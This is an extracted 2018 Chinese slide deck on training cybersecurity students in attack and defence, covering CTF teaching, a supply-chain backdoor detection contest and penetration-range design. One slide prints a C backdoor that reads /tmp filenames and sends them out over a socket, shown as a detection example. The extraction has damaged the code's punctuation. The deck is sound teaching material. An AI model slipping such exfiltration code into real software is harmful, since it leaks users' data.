2018年攻防兼備的實戰型網絡安全人才培養實踐.pdf

《2018年攻防兼備的實戰型網絡安全人才培養實踐.pdf》由會員分享，可在線閱讀，更多相關《2018年攻防兼備的實戰型網絡安全人才培養實踐.pdf（31頁珍藏版）》請在三個皮匠報告上搜索。

1、目錄培養模式授課方法科研思路實戰演練中國科學院研究生兩段式培養模式中國科學院大學（簡稱“國科大”）與中國科學院各研究所在管理體制、師資隊伍、培養體系、科研工作等方面“共有、共治、共享、共發展”，實現高度融合。通過科教融合，匯聚中科院優質資源，適當引入外部資源，為學生提供最好的教育資源。力爭使研究生在一年的集中學習環節中把所涉及的知識學深、學扎實，為后幾年進入研究階段的學習打好基礎。第一階段校園集中授課以課程建設為抓手第二年回到各研究所，進入課題組，邊進行科研實踐，邊進行學科專業課和特色課程的學習，在導師的指導下完成研究生的科研論文。第二階段 研究所科研學習與科研實踐相結合深度科教融合核心使命：

2、培養造就高質量創新創業人才！高質量創新創業人才的評價要素是什么？理論知識實踐能力創新思維創業能動性目錄培養模式授課方法科研思路實戰演練第一階段校園集中授課學習資料多攻防技術發展迅速，大量論文、書籍、帖子、報告、在線站點、開源項目安全資訊多網絡安全事件頻發微信群安全簡訊朋友圈轉發文章互聯網新媒體CTF賽事多校賽/省賽/國賽高校主辦/校企合辦/企業獨立組織引導競賽觀？課程怎么教？如何劃重點？多參賽就好？上課學什么？哪些值得看？老師視角學生視角授課方法知識鏈牽引工具產品了解國內外工業界情況事件案例加強代入感讓知識可見學術成果緊跟國內外學術界進展理論體系理論體系保證知識的系統性攻防實踐加深對課堂講授內

3、容的理解授課方法：以Web安全技術為例攻防實踐在攻防實踐方面，把CTF比賽引入授課過程中，針對授課內容知識點設計題目，成績納入期末總成績。采用“單人組隊比賽、課堂集中解題、隨時隨意討論“的形式，確保每一位學生都能體驗基于CTF的攻防實踐過程，進而加深每一個人對課堂講授內容的理解，建立Web安全形象思維和安全意識。目錄培養模式授課方法科研思路實戰演練第二階段 研究所科研【立足業界需求】在“理論體系-學術成果-工具產品-事件案例-攻防實踐”知識鏈條牽引下，立足業界需求，依托研究所科研項目，聚焦興趣點?！咎釤捒茖W問題】充分調研國內外學術界、工業界研究現狀，自主提出關鍵科學問題，并開展系統深入的研究。

4、【真實場景驗證】研發原型系統，在真實環境下部署，測試功能和性能。研究方向興趣愛好業界需求科研項目如何有益于解決真實業務場景問題？如何開展科研實踐？網絡安全的本質在對抗，對抗的本質在攻防兩端能力的較量。要以技術對技術，以技術管技術，做到魔高一尺、道高一丈?！竟澾x自419講話】從攻擊者視角分析問題，以防御者視角解決問題，用實戰演練檢驗效果。攻防角色互換科研思路：以軟件供應鏈安全為例近些年，從XcodeGhost事件，到Xshell后門、python pip源欺騙性污染釣魚。軟件供應鏈安全事件頻發，且具有威脅對象種類多、極端隱蔽、攻擊成本低回報高、檢測困難等特性。軟件供應鏈是指由軟件開發環節，交付環

5、節和使用環節組成的功能鏈。而軟件供應鏈污染則是在軟件供應鏈中的各個環節中，利用不同的技術對軟件進行污染。源代碼內部組件外部組件開發執行邏輯應用程序交付使用需求設計編寫編譯分發下載安裝運行升級生成軟件供應鏈安全威脅模型圖2018年軟件供應鏈安全大賽“C源碼專題賽”分站賽第一名2018功守道阿里軟件供應鏈安全大賽，是聚焦軟件供應鏈安全范疇內泛化的攻擊面與應對技術、策略，面向業界、學術領域，采用對抗為主的全新挑戰賽形式。中科院信工所團隊作為防守方從防御的角度檢測題目中是否存在軟件供應鏈安全風險點。在C源碼專題賽分站賽3的183個待檢測樣本中，發現惡意后門數量81個，正確解題數量115道。獲得C源碼專

6、題賽分站賽第一名，并直接晉級總決賽。2018年軟件供應鏈安全大賽“C源碼專題賽”比賽過程惡意行為分類建?？偨Y幾十種模型：敏感函數集合+上下文約束關系單點惡意行為：系統敏感信息采集等；二階段惡意行為：用戶操作歷史的讀取和無校驗網絡傳出；復合惡意行為：鍵盤hook等。C源碼樣本下載183個待檢測C源碼樣本比賽3小時，提交結果5次，發現惡意后門數量81個，正確解題115道。污點分析模型匹配基于LLVM pass框架的中間代碼表示，進而檢測惡意行為C源碼中間代碼表示；污點分析：發現疑似敏感行為；模型匹配：I/O操作網絡傳出。誤報過濾結果提交實現C源碼惡意后門自動化檢測系統基于路徑可達性分析的誤報過濾。

7、2018年軟件供應鏈安全大賽“C源碼專題賽”解題舉例int s;char buff1024;DIR*dir_path;struct sockaddr_in sockaddin;struct dirent*path;memset(buff,0,sizeof(buff);dir_path=opendir(/tmp);if(dir_path)while(path=readdir(dir_path)!=NULL)sprintf(buff,%sn%s,buff,path-d_name);closedir(dir_path);if(s=socket(PF_INET,SOCK_STREAM,IPPROTO_

8、TCP)0)gotoExit;memset(&sockaddin,0,sizeof(sockaddin);if(connect(s,(struct sockaddr*)&sockaddin,sizeof(sockaddin)0)gotoExit;send(s,buff,sizeof(buff),0);close(s);Exit;污染源收集“/tmp”目錄下，所有文件的文件名無校驗網絡輸出污點分析：發現污點數據流向send函數（敏感操作），疑似敏感行為，進行深度檢測分析；模型匹配：I/O操作網絡傳出，進行敏感行為模型匹配，發現執行時可觸發敏感行為，進行觸發點定位。知識鏈牽引+攻防角色互換形成基于

9、“理論體系-學術成果-工具產品-事件案例-攻防實踐”知識鏈牽引的授課思路，以及“從攻擊者視角分析問題，以防御者視角解決問題，用實戰演練檢驗效果”攻防角色互換的科研思路。攻防兼備的實戰型網安人才培養實踐目錄培養模式授課方法科研思路實戰演練2017貴陽大數據及網絡安全攻防演練“安全成果一等獎”2017貴陽大數據及網絡安全攻防演練，是在真實網絡環境中，針對真實目標的滲透測試演練。中科院信工所評測團隊，針對相關目標發現并提交重要漏洞50多個，率先攻破多個重點或核心目標，控制重點及核心目標關鍵服務器近30臺，突破五家單位系統的內網并控制大量內網主機，包括工控領域系統。榮獲最高獎項“安全成果一等獎”。20

10、17貴陽大數據及網絡安全攻防演練“安全成果一等獎”系統突破明確漏洞造成的影響，進一步的提權、內網滲透漏洞利用漏洞掃描、漏洞挖掘與利用、手工滲透測試信息搜集偵查域名、子域名、開放端口，識別系統信息明確目標17個真實目標，含4個核心目標、8個重點目標*工控系統企事業單位*大數據平臺8天12小時，5人，提交漏洞50多個，控制關鍵服務器近30臺，突破并控制五家單位系統的內網主機。形成報告總結漏洞成因、利用方法、防御手段，形成報告全國高校網安聯賽（X-NUCA）中國科學院深圳市人民政府中國網絡空間安全協會指導單位中國科學院大學網絡空間安全學院湖南合天智匯信息技術有限公司北京永信至誠科技股份有限公司承辦單

11、位中國科學院信息工程研究所深圳市科技創新委員會主辦單位深圳市南山區人民政府360企業安全集團深圳大學協辦單位中國科學院信息工程研究所于2016年創辦的“全國高校網安聯賽(National University Cybersecurity Association，簡稱X-NUCA)”，是面向全國高校學生的網絡安全技能賽，推出“競賽+”模式，大賽秉承“寓學于賽，以賽促學”的理念，旨在更好地促進網絡安全人才的培養和選拔。第二屆X-NUCA2017三期線上賽總決賽深圳第一屆X-NUCA2016五期線上賽總決賽北京2016全國高校網安聯賽（X-NUCA2016）第一屆全國高校網安聯賽(X-NUCA201

12、6)比賽歷程2016年7月2016年12月總決賽線上解題模式+線下攻防模式存在問題：重技巧、輕實戰，脫離真實網絡攻防場景2017全國高校網安聯賽（X-NUCA2017）12月19-22日年度總決賽Web安全靶場滲透專題賽8月26日10月8日Windows 7靶場評測專題賽11月25日企業安全眾測靶場挑戰賽第二屆全國高校網安聯賽(X-NUCA2017)比賽歷程基于網絡靶場的網安聯賽X-NUCA2017利用網絡靶場技術，為參賽者提供接近于真實互聯網環境的網絡攻防對抗場景。如何設計接近于真實互聯網環境的網絡攻防場景？網絡區域設定劃分公網、內網、專網環境網絡場景選取源于真實互聯網環境網絡拓撲抽象定位關

13、鍵網絡節點攻防題目設計立足攻防實戰經驗風險評估應急響應樣本分析追蹤溯源滲透測試以X-NUCA2017總決賽團隊賽比賽環境為例網絡場景選取公網部分：與互聯網連接，用于處理一般性事務，或對外的門戶網站。內網部分：一般是單位內部局域網絡，用于日常辦公、對公網區域管理等。此區域內可能會存儲業務系統中的較敏感信息。專網部分：一般用于與總部交換核心數據或處理特殊業務，屬于業務中核心的部分。以X-NUCA2017總決賽團隊賽比賽環境為例網絡拓撲抽象比賽選手網關服務器以X-NUCA2017總決賽團隊賽比賽環境為例比賽選手公網內網專網網關服務器一個公網區域整個業務中接入公網的服務，節點包括門戶網站及數據庫等。選

14、手可以直接訪問到公網服務，是整個環境的入口。三個內網區域包括內網服務器、網站管理員工作PC、代碼倉庫服務器等。3個內網分別由3個公網服務接入。一個專網區域核心業務區，包括Web服務器、業務應用服務器。所有專網的最內層節點在此區域連成一個大網。網絡區域設定以X-NUCA2017總決賽團隊賽比賽環境為例Web CMS漏洞弱口令一個密碼多處使用不正確的網絡配置日志中的隱藏信息黑客攻擊痕跡跨網攻擊代理跳板比賽選手公網內網專網網關服務器攻防題目設計隱藏了多個關鍵信息，這些信息是選手內網滲透路徑中的必須信息部署AWD模式的競賽題目，在攻擊其他隊伍的同時，需要修復自己的漏洞以X-NUCA2017總決賽團隊賽比賽環境為例20支隊伍100名隊員300個節點1個公網3個內網1個專網公網內網專網的滲透路徑以專網服務器為跳板的攻防模式X-NUCA2017總決賽網絡靶場可視化X-NUCA2017總決賽比賽場館實景圖結束語人才培養體系建設是一個永恒的話題，十分必要；學生培養質量最終由老師和學生這兩個具有主觀能動性的主體決定，發揮不好這兩個主體的主動性，質量無從談起；實戰型網絡安全人才培養任重道遠，師資隊伍建設是根本。謝 謝！